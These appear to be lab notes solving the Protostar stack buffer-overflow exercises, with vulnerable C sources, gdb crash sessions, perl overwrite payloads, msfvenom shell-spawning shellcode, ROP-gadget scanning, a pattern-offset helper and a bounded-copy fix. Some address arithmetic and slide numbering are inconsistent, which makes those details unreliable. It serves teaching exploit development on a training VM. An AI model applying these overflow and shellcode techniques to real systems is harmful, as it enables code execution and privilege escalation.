The buffer overflow vulnerability in Level 6 can be exploited by overwriting the return address on the stack to redirect execution flow. The return address can be overwritten with a format string pointing to shellcode stored elsewhere in memory. The shellcode executes to provide a shell, avoiding detection methods in the binary. Precise offsets must be determined through pattern creation and debugging to successfully exploit the vulnerability.
2. What Is A Buffer Overflow?
A buffer overflow occurs when a program or process tries to store more data in a buffer (a temporary data storage area) than it was intended to hold. Since buffers are created to contain a finite amount of data, the extra information, which has to go somewhere, can overflow into adjacent buffers, corrupting or overwriting the valid data held in them.
3. Tools In Use
Perl – Inline perl expressions, either using $( expression ) or expression | program, depending on the need. Used to quickly
GDB – GNU Debugger, allows debugging of applications and inspection of live variables, memory, and registers. Crash dumps, known as core files, can also be analyzed in the same manner.
Metasploit Console: In ../msf/tools
pattern_create.rb – Creates a specialized pattern (no 4-byte sequence repeats) that can be used to identify how many bytes into a buffer important locations, such as EIP or variables, are.
pattern_offset.rb – Given a small subset of bytes returned from an overflowed buffer that was filled with a pattern from pattern_create, locates how far into the buffer those bytes are.
Venom (msfvenom) – Creates shellcode, with the ability to choose the payload's function and to encode the shellcode to avoid bad characters and detection.
4. Preparing Protostar
In virtual console window
Login
User: root
Pass: godmode
Get an IP
dhclient & ifconfig | grep "inet addr"
5. Preparing Protostar Cont.
Login
ssh user@[IP]
Pass: user
Remove the core dump size limit
ulimit -c unlimited
ulimit -a | grep core
Change to bash shell
/bin/bash
Change to binary dir
cd /opt/protostar/bin/
6. Level 0
(Source)
#include <stdio.h>

int main(int argc, char **argv) {
    volatile int modified;
    char buffer[64];

    modified = 0;
    gets(buffer);              /* unbounded read: input longer than 64 bytes runs into 'modified' */

    if(modified != 0) {
        printf("you have changed the 'modified' variable\n");
    } else {
        printf("Try again?\n");
    }
}
7. Level 0
(Diagram)
The stack, from higher to lower addresses:
    Previous stack frames (contain the previous EIP & ESP)
    int modified = 0
    char buffer = 64 bytes
    Uninitialized stack space
8. Level 0
(Solution)
/opt/protostar/bin$ ./stack0
test
Try again?
/opt/protostar/bin$ perl -e 'print "a"x68' | ./stack0
you have changed the 'modified' variable
9. Level 1
(source)
#include <stdio.h>
#include <string.h>
#include <err.h>

int main(int argc, char **argv) {
    volatile int modified;
    char buffer[64];

    if(argc == 1) {
        errx(1, "please specify an argument\n");
    }

    modified = 0;
    strcpy(buffer, argv[1]);   /* unbounded copy: argv[1] longer than 64 bytes overwrites 'modified' */

    if(modified == 0x61626364) {
        printf("you have correctly got the variable to the right value\n");
    } else {
        printf("Try again, you got 0x%08x\n", modified);
    }
}
10. Level 1
The Stack (Diagram)
The stack, from higher to lower addresses:
    Previous stack frames (contain the previous EIP & ESP)
    int modified = 0 (goal: modified == 0x61626364)
    char buffer = 64 bytes
    Uninitialized stack space
11. Level 1
(Solution)
./stack1 test
Try again, you got 0x00000000
./stack1 $(perl -e 'print "a"x70')
Try again, you got 0x61616161
./pattern_create.rb 70
[MSF Pattern]
./stack1 [MSF Pattern]
Try again, you got 0x63413163
./pattern_offset.rb 63413163 = 64 bytes
./stack1 $(perl -e 'print "a"x64 . "\x64\x63\x62\x61\n\r"')
you have correctly got the variable to the right value
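As an added example written for these notes (a re-implementation, not Metasploit's pattern_create.rb or pattern_offset.rb), this C program builds the same "Aa0Aa1Aa2..." pattern and maps a value read out of EIP after a crash back to its byte offset. It reproduces the 64 found above for 0x63413163 and, more generally, the offsets found the same way in Levels 5 and 7. pattern_create and pattern_offset are names chosen here.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>
/* Upper * lower * digit triples of 3 bytes each: 20280 bytes before the pattern repeats. */
#define MAX_PATTERN (26 * 26 * 10 * 3)

/* Write the first len bytes of the "Aa0Aa1Aa2..." pattern into out (which must hold
   len + 1 bytes) and NUL-terminate it. Returns the number of pattern bytes written. */
size_t pattern_create(char *out, size_t len) {
    size_t pos = 0;
    for (char u = 'A'; u <= 'Z'; u++)
        for (char l = 'a'; l <= 'z'; l++)
            for (char d = '0'; d <= '9'; d++) {
                const char triple[3] = { u, l, d };
                for (int i = 0; i < 3; i++) {
                    if (pos >= len) { out[pos] = '\0'; return pos; }
                    out[pos++] = triple[i];
                }
            }
    out[pos] = '\0';
    return pos;
}

/* Map the 32-bit value seen in EIP after the crash back to its offset in the pattern.
   x86 is little-endian, so the low byte of the register was the first byte in memory.
   Returns -1 if the value is not part of the pattern. */
long pattern_offset(uint32_t eip) {
    static char pattern[MAX_PATTERN + 1];
    char needle[5];
    pattern_create(pattern, MAX_PATTERN);
    for (int i = 0; i < 4; i++) {
        needle[i] = (char)((eip >> (8 * i)) & 0xff);
        if (needle[i] == '\0')          /* pattern bytes are never NUL */
            return -1;
    }
    needle[4] = '\0';
    const char *hit = strstr(pattern, needle);
    return hit ? (long)(hit - pattern) : -1;
}

int main(void) {
    char buf[81];
    pattern_create(buf, 80);            /* same length as the pattern fed to stack1 / stack5 */
    printf("%s\n", buf);
    printf("0x63413163 -> offset %ld\n", pattern_offset(0x63413163));   /* 64, as in Level 1 */
    return 0;
}
```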
12. Level 2
(Source)
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <err.h>

int main(int argc, char **argv) {
    volatile int modified;
    char buffer[64];
    char *variable;

    variable = getenv("GREENIE");

    if(variable == NULL) {
        errx(1, "please set the GREENIE environment variable\n");
    }

    modified = 0;
    strcpy(buffer, variable);  /* unbounded copy from an attacker-controlled environment variable */

    if(modified == 0x0d0a0d0a) {
        printf("you have correctly modified the variable\n");
    } else {
        printf("Try again, you got 0x%08x\n", modified);
    }
}
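Levels 0 to 2 share one defect: gets() or strcpy() copies input of unchecked length into a 64-byte stack buffer. As an added example (not Protostar's code), here is stack1 with the copy replaced by a length-checked one, so the 70-byte argument from the Level 1 solution is rejected instead of reaching 'modified'. copy_bounded, stack1_fixed and stack1_fixed_repeated are names chosen here.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 64   /* same buffer size as stack0, stack1 and stack2 */

/* Bounded replacement for strcpy(buffer, argv[1]) / gets(buffer): copies src into dst
   only if it fits, terminating NUL included. Returns 0 on success, -1 if src is too long. */
int copy_bounded(char *dst, size_t dst_size, const char *src) {
    const char *nul = memchr(src, '\0', dst_size);   /* look for the NUL within dst_size bytes */
    if (nul == NULL) {                                 /* none found: src would overflow dst */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, (size_t)(nul - src) + 1);
    return 0;
}

/* stack1 with the unbounded strcpy replaced. Returns the value of 'modified' after the
   copy (always 0 now, since the copy can no longer run past buffer), or -1 if the
   argument was rejected. */
int stack1_fixed(const char *arg) {
    volatile int modified = 0;
    char buffer[BUF_SIZE];
    if (copy_bounded(buffer, sizeof buffer, arg) != 0)
        return -1;
    return modified;
}

/* Helper mirroring perl -e 'print "a"xN': feed n copies of c to stack1_fixed. */
int stack1_fixed_repeated(char c, size_t n) {
    char input[256];
    if (n >= sizeof input)
        return -2;
    memset(input, c, n);
    input[n] = '\0';
    return stack1_fixed(input);
}

int main(int argc, char **argv) {
    if (argc != 2) {
        fprintf(stderr, "please specify an argument\n");
        return 1;
    }
    int r = stack1_fixed(argv[1]);
    if (r == -1)
        printf("argument longer than %d bytes rejected\n", BUF_SIZE - 1);
    else
        printf("modified is still 0x%08x\n", r);
    return 0;
}
```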
22. Level 5
The Stack (Diagram)
The stack, from higher to lower addresses:
    Previous stack frames (contain the previous EIP & ESP): overwritten with a NOP sled and shellcode
    Current EIP = 0x08048424: must be overwritten to point to our shellcode
    char buffer = 76 bytes
    Uninitialized stack space
(Source)
#include <stdio.h>

int main(int argc, char **argv) {
    char buffer[64];

    gets(buffer);              /* unbounded read straight into the stack buffer */
}
23. Level 5
(Solution 1)
perl -e 'print "a"x80' | ./stack5
Segmentation fault
./pattern_create.rb 80
[MSF Pattern]
gdb --quiet ./stack5
run
[MSF Pattern]
Program received signal SIGSEGV, Segmentation fault.
0x63413563 in ?? ()
(gdb) x $esp
0xbffff7c0
./pattern_offset.rb 63413563 = 76 bytes
Location of EIP = 0xbffff760 + 76h = 0xbffff7d6
24. Level 5
(Solution 2)
msfvenom -p linux/x86/exec -f pl -b '\x00\xff' CMD=/bin/bash PrependSetresuid=true
Output: ~70 bytes of shellcode
perl -e 'print "a"x76 . "\xc0\xf7\xff\xbf" . "\x90"x16 . "[MSF Shellcode]"' | ./stack5
Result: the program exits cleanly without executing a shell.
Reason: /bin/dash has issues with the stdin it inherits from the original program; it must detect this condition and close automatically. This is due to the gets() function being used to read the input.
More Details: StackOverflow.com
27. Level 6
The Stack (Diagram)
The stack, from higher to lower addresses:
    Previous stack frames
    Current EIP
    char buffer = 64 bytes
    Uninitialized stack space
28. Level 6
The Stack (Diagram 2)
The stack after the overwrite, from higher to lower addresses:
    This address
    Address of SHELLCODE
    Address of SHELLCODE
    Address of FORMATSTRING
    Address of execl()
    Address of printf()
    Previously EIP
    char buffer = 64 bytes
    Uninitialized stack space
36. Level 7
(Solution 1)
./pattern_create.rb 100
[MSF Pattern]
gdb --quiet ./stack7
input path please: [MSF Pattern]
Program received signal SIGSEGV, Segmentation fault.
0x37634136 in ?? ()
./pattern_offset.rb 0x37634136
80
37. Level 7
(Solution 2)
scp user@192.168.1.10:/opt/protostar/bin/stack7 ~/stack7
msfelfscan -j edx ~/stack7
[~/stack7]
msfelfscan -p ~/stack7
[~/stack7]
0x08048492 pop ebx; pop ebp; ret
0x080485c7 pop edi; pop ebp; ret
0x080485f7 pop ebx; pop ebp; ret
38. Level 7
(Solution 3)
perl -e 'print "a"x80 . "\x92\x84\x04\x08" . "c"x100' > /tmp/7-test
gdb --quiet ./stack7
(gdb) run < /tmp/7-test
Program received signal SIGSEGV, Segmentation fault.
0x63636363 in ?? ()
./pattern_create.rb 50
[MSF Pattern]
perl -e 'print "a"x80 . "\x92\x84\x04\x08" . "[MSF Pattern]"' > /tmp/7-test
gdb --quiet ./stack7
(gdb) run < /tmp/7-test
Program received signal SIGSEGV, Segmentation fault.
0x33614132 in ?? ()
39. Level 7
(Solution 4)
./pattern_offset.rb 0x33614132
8
perl -e 'print "a"x80 . "\x92\x84\x04\x08" . "C"x8 . "D"x4' > /tmp/7-test
gdb --quiet ./stack7
(gdb) run < /tmp/7-test
Starting program: /opt/protostar/bin/stack7 < /tmp/7-test
Program received signal SIGSEGV, Segmentation fault.
0x44444444 in ?? ()
msfvenom -p linux/x86/exec -f pl -b '\xc0\x04\x00\xff' CMD='touch /tmp/touch' PrependSetresuid=true
[MSF Shellcode]
export SHELLCODE=`perl -e 'print "[MSF Shellcode]"'`
~/getenvaddr SHELLCODE ./stack7
SHELLCODE will be at 0xbffff960